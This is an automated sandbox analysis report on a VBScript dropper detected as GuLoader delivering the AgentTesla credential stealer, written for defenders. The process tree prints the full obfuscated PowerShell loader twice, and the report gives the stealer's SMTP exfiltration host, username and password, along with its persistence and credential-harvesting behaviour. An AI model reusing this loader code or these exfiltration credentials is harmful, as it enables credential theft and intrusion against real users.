Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
G4-TODOS.vbs

Overview

General Information

Sample name:G4-TODOS.vbs
Analysis ID:1430754
MD5:0894754b81c21bfa79481c3940d134d5
SHA1:381352cd7b6551606bfb8c07cd77d7c50ffe41cc
SHA256:0d456eedf9663741ffc712deadd8f8960e711b68de8b198ec1aec9dc4e3279d4
Tags:Formbookvbs
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1516 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanthgshptse nfignResissop rd)Irrit ');Exuberate (Fritidsmuligheds 'Laane$D.sbrgFro.elOversoh.mogbStathaKnuselCenti:UpbuofOliedoHolderUnw re .pornArbu o,imstosupernHofjg= .add$.erceIBaktenwoodsfBortfeG,ptacTiptit LateiSkarloExtran Ab o. S.elsTomogpunquilMilitiEkstrtPotla(Hemih$,rnseN,arato Kn,pnFy decStilloSknh m.anpibCarpeu PharsUdfritFazelidobbeb nklilForhaeUngen1Foofa7.abbi3F.izz)Ectro ');$Infection=$forenoon[0];Exuberate (Fritidsmuligheds 'Anita$ metyg DrkilB endoSolenbAdapta Wom.l hung:SstjeM.dusti BrndkRip arNucleoFlagef askioUnyconCasheiNar.gs Vis kr.dia=.esteNPincheIndkawMeth.-Obse.OSvejsbCharkjPrecaeF,natc InvatEchin Die.SFordkyBioc.s Brost reageChickmConve.uncolNFagvieUnnartUjvn,.ColloW otawe bestb Fr,mCTekstlForbei S.ske SkalnE,tert H,rn ');Exuberate (Fritidsmuligheds 'Belli$KatteMBl,dei nsuskEditar NskeoSulkafScotto StoknSprini,vistsSul.okRecon. V ldHHer keCrassa StordLn roe,eclirRef rsLeuk [ Camp$OktobM UgeseEelbldBahadi urokcSelskoHotbrp .ogrsAimblyPrciscSpirah ,atto Co kl Monoo MalegHep ti ParacTransa TubelInsin],aneb=Uforu$Paul.FLuteol Tu coLeadikPeachkEstheeGalacdTid,peRecit ');$Besynderligeres=Fritidsmuligheds 'EncepM enstiCountkHalssrP,atio SvejfPolluo Mal.nIsoceisonlys ammekSarco.SociaDFnge.oCon twNonlin nsollUnn goBiu.ia Skjod Na sF eleciKa,asl .utieVirak(tardy$.ndiaIC,ryinPrsidf Eftee ,unacSociat CrimiBrddeo ongsnBefat, un e$ SparD Flora KlintKl.ddaPhospfPeriaoGunn rGutiemSteriaSar,btscotts mino)Nedhn ';$Besynderligeres=$Supplicate[1]+$Besynderligeres;$Dataformats=$Supplicate[0];Exuberate (Fritidsmuligheds 'Lavry$.ewingPaprilRetsvoBl wfbDr.esaHalvfl Bul,:GrahaCDogeah un ea.oders liqueE.antdUnder1 Gas.8 .upe0D,tai=Journ(StonyT OrddeSweetsVg est,bser-ProloPerythaEuropt .elihPo sy gril$UnsorDSal,aaDu,metFamilaFa,etfAmyl,oProphrLoamimArvebaApicut PantsEno.i).cety ');while (!$Chased180) {Exuberate (Fritidsmuligheds 'Faare$NoningOpe.olBesnroLegemb Fo,la OmkrlSolde: FravZProacyIndirm,anguobalail,osseoInscrgInteri KnipeFathmsAp.ci=Aceti$OutwatChri rWhir uNord.eDoser ') ;Exuberate $Besynderligeres;Exuberate (Fritidsmuligheds 'BisamS PhostR steaArchbrCo.totKnald-sttteSPlan lMul teSminkeLsgngpGrund Anhal4Pala. ');Exuberate (Fritidsmuligheds 'Lgten$Squirg ,evil DataoAria bLa.tsa BakelKalkb:Ch.ckCBathth F,oraMisbisKaleieMi bedE,ter1 Afh 8Maksi0,anch=.ubpr(b,dwaTTri ue SystsFaks trekla-RaadiP Par aSh edtMorfih Mala Unpre$NeuraDFridaaoutqutKneppa.achifMelleoCoenar SeismCabbaaCon,itExampsCi at)Laese ') ;Exuberate (Fritidsmuligheds 'Bybli$ SorbgSladdl ovehoQuestbCoveraChi,ilHillo:NvnviE BryokC nsosMiljbpJed.oeT,lserRep,rtEup ogHektorTyphouTa.sepSten,pPhongeAceta=Typer$Or.ergIns,tl Disso rbeb menuaAudiolCrouk:C.ltuLIdepoyanacrdKoncishaandiLeanbd BalleI dusrDeinknSkudse.ircu+Elvrk+Phone%elevh$KreatfHj peoPamphrCausee ,olinVuggeoCoatdoFemtinDekup.WholecFemaloIndleuunsp,n invotFau.e ') ;$Infection=$forenoon[$Ekspertgruppe];}Exuberate (Fritidsmuligheds ' Pre,$Bladkg Jernl,nisookneelbKommeayuquilbu ka:BastaBLmmellFuroroMellekFilhaeTre,cr MisskMola l.dermrRetniiTrivin Phryg otoneSydamrTimmenPreemeUnmo,sRelat Kode =Ty,ef shruGChriseP.moltSilen-RegnbCFilstoIndusn Hea t.mertePer,inModert S,ri Naian$Pa,hrD UncoaPul.etA.orpa Fin fNoncioParchr Untim Ca,iaUdskrtA,skasMove. ');Exuberate (Fritidsmuligheds 'Skrat$knowlg Livvl Af,ooLegi bElgenaFarvel gter:grundFTa.araMatthrForflrMaskaiAr ejeKartorsinatiLimp,e Fj.rs rila Frdig=Dyknd eleg[BureaS O eryTectos hacotBegiveHydrom.atak.OppiaCKloakosolsenKnopsvUndereV.difrUnw.atForly]B vua:S,aae:MisdeFKighorHalvkoFang.mSchavBSmalsa,umeasMensueMetal6Fos,i4MasseSPor,atNonser IdgaiStat,nVinbjg Tuml(We ld$,ogplBSv vll F lno TosdkT,tere CoefrTitankSsterlInfatr A,piiChalcn ,utsg IrraeTrikor AilenIntraeCentrsPersi)Spidv ');Exuberate (Fritidsmuligheds 'Ugeln$AntirgUnslelF,steoBrac,bheelmaLakfalProfe: PaucPUforahGonosiVa.gflTh usoCantamSy onyNonextC.eckhMa,kriFrk pcFrpe ,eind=K,gni Aarsr[MeasuSHaandyUnders V.rdtWat,reBowbam Lov..S,lndTsleuteC.utixUdda,t nben.KreolE Can n No,pcMistaoUn.rodHusbaiBefoonSemidgMordv] Nitr:Rr an:UnfraAPrat SEmigrCTekstIFdestIGrave.Muff,GRectieAbusetKoreoSQuie.tco,alr mejsi HulknBarkegFlatl(Preco$Laur F Aquea CresrAnstir gjeniKontoeGvererxeropi .rndeHermosSpre.)Loplu ');Exuberate (Fritidsmuligheds 'Machi$ unelg,eendlMorseoRegiobNeuroabutt.l Inca: CornKOb ucoFl,brnAwhirk outcuPolyprA ronrBesmoePointrPrehaeTranstIndsb=Beki $ BonkPSubinhOversiVirkslSubstoSolatmg oinyFladtttin.mh flaiTheoscSkamf.Afg ssVi.giuHyp,cbSl,tssTrke,tskrhara.basiKonsenMor,egU,ryd(Svmme2frise9 .ksm8Epica1Comel0 Vild5 Begr,Mab n2genne8Overm5 hilp0typis0Smalh) erne ');Exuberate $Konkurreret;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1468 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2080 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanthgshptse nfignResissop rd)Irrit ');Exuberate (Fritidsmuligheds 'Laane$D.sbrgFro.elOversoh.mogbStathaKnuselCenti:UpbuofOliedoHolderUnw re .pornArbu o,imstosupernHofjg= .add$.erceIBaktenwoodsfBortfeG,ptacTiptit LateiSkarloExtran Ab o. S.elsTomogpunquilMilitiEkstrtPotla(Hemih$,rnseN,arato Kn,pnFy decStilloSknh m.anpibCarpeu PharsUdfritFazelidobbeb nklilForhaeUngen1Foofa7.abbi3F.izz)Ectro ');$Infection=$forenoon[0];Exuberate (Fritidsmuligheds 'Anita$ metyg DrkilB endoSolenbAdapta Wom.l hung:SstjeM.dusti BrndkRip arNucleoFlagef askioUnyconCasheiNar.gs Vis kr.dia=.esteNPincheIndkawMeth.-Obse.OSvejsbCharkjPrecaeF,natc InvatEchin Die.SFordkyBioc.s Brost reageChickmConve.uncolNFagvieUnnartUjvn,.ColloW otawe bestb Fr,mCTekstlForbei S.ske SkalnE,tert H,rn ');Exuberate (Fritidsmuligheds 'Belli$KatteMBl,dei nsuskEditar NskeoSulkafScotto StoknSprini,vistsSul.okRecon. V ldHHer keCrassa StordLn roe,eclirRef rsLeuk [ Camp$OktobM UgeseEelbldBahadi urokcSelskoHotbrp .ogrsAimblyPrciscSpirah ,atto Co kl Monoo MalegHep ti ParacTransa TubelInsin],aneb=Uforu$Paul.FLuteol Tu coLeadikPeachkEstheeGalacdTid,peRecit ');$Besynderligeres=Fritidsmuligheds 'EncepM enstiCountkHalssrP,atio SvejfPolluo Mal.nIsoceisonlys ammekSarco.SociaDFnge.oCon twNonlin nsollUnn goBiu.ia Skjod Na sF eleciKa,asl .utieVirak(tardy$.ndiaIC,ryinPrsidf Eftee ,unacSociat CrimiBrddeo ongsnBefat, un e$ SparD Flora KlintKl.ddaPhospfPeriaoGunn rGutiemSteriaSar,btscotts mino)Nedhn ';$Besynderligeres=$Supplicate[1]+$Besynderligeres;$Dataformats=$Supplicate[0];Exuberate (Fritidsmuligheds 'Lavry$.ewingPaprilRetsvoBl wfbDr.esaHalvfl Bul,:GrahaCDogeah un ea.oders liqueE.antdUnder1 Gas.8 .upe0D,tai=Journ(StonyT OrddeSweetsVg est,bser-ProloPerythaEuropt .elihPo sy gril$UnsorDSal,aaDu,metFamilaFa,etfAmyl,oProphrLoamimArvebaApicut PantsEno.i).cety ');while (!$Chased180) {Exuberate (Fritidsmuligheds 'Faare$NoningOpe.olBesnroLegemb Fo,la OmkrlSolde: FravZProacyIndirm,anguobalail,osseoInscrgInteri KnipeFathmsAp.ci=Aceti$OutwatChri rWhir uNord.eDoser ') ;Exuberate $Besynderligeres;Exuberate (Fritidsmuligheds 'BisamS PhostR steaArchbrCo.totKnald-sttteSPlan lMul teSminkeLsgngpGrund Anhal4Pala. ');Exuberate (Fritidsmuligheds 'Lgten$Squirg ,evil DataoAria bLa.tsa BakelKalkb:Ch.ckCBathth F,oraMisbisKaleieMi bedE,ter1 Afh 8Maksi0,anch=.ubpr(b,dwaTTri ue SystsFaks trekla-RaadiP Par aSh edtMorfih Mala Unpre$NeuraDFridaaoutqutKneppa.achifMelleoCoenar SeismCabbaaCon,itExampsCi at)Laese ') ;Exuberate (Fritidsmuligheds 'Bybli$ SorbgSladdl ovehoQuestbCoveraChi,ilHillo:NvnviE BryokC nsosMiljbpJed.oeT,lserRep,rtEup ogHektorTyphouTa.sepSten,pPhongeAceta=Typer$Or.ergIns,tl Disso rbeb menuaAudiolCrouk:C.ltuLIdepoyanacrdKoncishaandiLeanbd BalleI dusrDeinknSkudse.ircu+Elvrk+Phone%elevh$KreatfHj peoPamphrCausee ,olinVuggeoCoatdoFemtinDekup.WholecFemaloIndleuunsp,n invotFau.e ') ;$Infection=$forenoon[$Ekspertgruppe];}Exuberate (Fritidsmuligheds ' Pre,$Bladkg Jernl,nisookneelbKommeayuquilbu ka:BastaBLmmellFuroroMellekFilhaeTre,cr MisskMola l.dermrRetniiTrivin Phryg otoneSydamrTimmenPreemeUnmo,sRelat Kode =Ty,ef shruGChriseP.moltSilen-RegnbCFilstoIndusn Hea t.mertePer,inModert S,ri Naian$Pa,hrD UncoaPul.etA.orpa Fin fNoncioParchr Untim Ca,iaUdskrtA,skasMove. ');Exuberate (Fritidsmuligheds 'Skrat$knowlg Livvl Af,ooLegi bElgenaFarvel gter:grundFTa.araMatthrForflrMaskaiAr ejeKartorsinatiLimp,e Fj.rs rila Frdig=Dyknd eleg[BureaS O eryTectos hacotBegiveHydrom.atak.OppiaCKloakosolsenKnopsvUndereV.difrUnw.atForly]B vua:S,aae:MisdeFKighorHalvkoFang.mSchavBSmalsa,umeasMensueMetal6Fos,i4MasseSPor,atNonser IdgaiStat,nVinbjg Tuml(We ld$,ogplBSv vll F lno TosdkT,tere CoefrTitankSsterlInfatr A,piiChalcn ,utsg IrraeTrikor AilenIntraeCentrsPersi)Spidv ');Exuberate (Fritidsmuligheds 'Ugeln$AntirgUnslelF,steoBrac,bheelmaLakfalProfe: PaucPUforahGonosiVa.gflTh usoCantamSy onyNonextC.eckhMa,kriFrk pcFrpe ,eind=K,gni Aarsr[MeasuSHaandyUnders V.rdtWat,reBowbam Lov..S,lndTsleuteC.utixUdda,t nben.KreolE Can n No,pcMistaoUn.rodHusbaiBefoonSemidgMordv] Nitr:Rr an:UnfraAPrat SEmigrCTekstIFdestIGrave.Muff,GRectieAbusetKoreoSQuie.tco,alr mejsi HulknBarkegFlatl(Preco$Laur F Aquea CresrAnstir gjeniKontoeGvererxeropi .rndeHermosSpre.)Loplu ');Exuberate (Fritidsmuligheds 'Machi$ unelg,eendlMorseoRegiobNeuroabutt.l Inca: CornKOb ucoFl,brnAwhirk outcuPolyprA ronrBesmoePointrPrehaeTranstIndsb=Beki $ BonkPSubinhOversiVirkslSubstoSolatmg oinyFladtttin.mh flaiTheoscSkamf.Afg ssVi.giuHyp,cbSl,tssTrke,tskrhara.basiKonsenMor,egU,ryd(Svmme2frise9 .ksm8Epica1Comel0 Vild5 Begr,Mab n2genne8Overm5 hilp0typis0Smalh) erne ');Exuberate $Konkurreret;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 3596 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 316 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • newfile.exe (PID: 3884 cmdline: "C:\Users\user\AppData\Roaming\newfile\newfile.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 3184 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • newfile.exe (PID: 824 cmdline: "C:\Users\user\AppData\Roaming\newfile\newfile.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.cash4cars.nz", "Username": "logs@cash4cars.nz", "Password": "logs2024!"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000012.00000002.2590450166.00000000220F4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000D.00000002.1846945449.0000000009760000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 7 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_4632.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x1023d:$b2: ::FromBase64String(
            • 0xd5c3:$s1: -join
            • 0x6d6f:$s4: +=
            • 0x6e31:$s4: +=
            • 0xb058:$s4: +=
            • 0xd175:$s4: +=
            • 0xd45f:$s4: +=
            • 0xd5a5:$s4: +=
            • 0xf7fb:$s4: +=
            • 0xf87b:$s4: +=
            • 0xf941:$s4: +=
            • 0xf9c1:$s4: +=
            • 0xfb97:$s4: +=
            • 0xfc1b:$s4: +=
            • 0xdce4:$e4: Get-WmiObject
            • 0xded3:$e4: Get-Process
            • 0xdf2b:$e4: Start-Process
            amsi32_2080.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x101a4:$b2: ::FromBase64String(
            • 0xd5c3:$s1: -join
            • 0x6d6f:$s4: +=
            • 0x6e31:$s4: +=
            • 0xb058:$s4: +=
            • 0xd175:$s4: +=
            • 0xd45f:$s4: +=
            • 0xd5a5:$s4: +=
            • 0xf7fb:$s4: +=
            • 0xf87b:$s4: +=
            • 0xf941:$s4: +=
            • 0xf9c1:$s4: +=
            • 0xfb97:$s4: +=
            • 0xfc1b:$s4: +=
            • 0xdce4:$e4: Get-WmiObject
            • 0xded3:$e4: Get-Process
            • 0xdf2b:$e4: Start-Process
            • 0x17ad8:$e4: Get-Process

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs", ProcessId: 1516, ProcessName: wscript.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\newfile\newfile.exe, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 316, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\newfile
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
